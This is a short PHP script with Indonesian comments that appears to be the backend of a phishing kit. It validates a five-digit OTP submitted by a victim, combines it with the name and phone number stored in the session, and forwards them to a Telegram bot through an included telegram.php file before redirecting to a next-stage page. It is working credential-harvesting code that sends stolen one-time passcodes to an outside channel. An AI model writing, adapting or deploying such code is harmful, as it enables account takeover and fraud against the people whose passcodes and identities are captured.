<?php
session_start(); // Mulai session untuk mengambil data sebelumnya

// Ambil data OTP dari form
$otpArray = $_POST['otp'];

// Gabungkan array menjadi satu string OTP
$otp = implode("", $otpArray);

// Validasi input OTP (pastikan tidak ada karakter selain angka dan panjang 5 karakter)
if (empty($otp) || !preg_match('/^[0-9]{5}$/', $otp)) {
    echo "Kode OTP harus terdiri dari 5 angka.";
    exit();
}

// Ambil data dari session yang sudah disimpan sebelumnya
$location = isset($_SESSION['location']) ? $_SESSION['location'] : 'Tidak diisi';
$division = isset($_SESSION['division']) ? $_SESSION['division'] : 'Tidak diisi';
$role = isset($_SESSION['role']) ? $_SESSION['role'] : 'Tidak diisi';
$nama = isset($_SESSION['nama']) ? $_SESSION['nama'] : 'Tidak diisi';
$nomor_telepon = isset($_SESSION['nomor_telepon']) ? $_SESSION['nomor_telepon'] : 'Tidak diisi';
$gender = isset($_SESSION['gender']) ? $_SESSION['gender'] : 'Tidak diisi';
$telegram_account = isset($_SESSION['telegram_account']) ? $_SESSION['telegram_account'] : 'Tidak diisi';
$email = isset($_SESSION['email']) ? $_SESSION['email'] : 'Tidak diisi';

// Format pesan yang akan dikirim ke Telegram
$message .= "╠➥ Nama: $nama\n";
$message .= "║\n";
$message .= "╠➥ Nomer: $nomor_telepon\n";
$message .= "║\n";
$message .= "╠➥ OTP: $otp\n";
$message .= "║\n";


// Panggil fungsi kirim pesan ke Telegram dari file telegram.php
require '../telegram.php';
sendMessageToTelegram($message); // Panggil fungsi yang sudah ada di telegram.php

// Redirect setelah pengiriman sukses
header('Location: ../data3.html');
exit();
?>
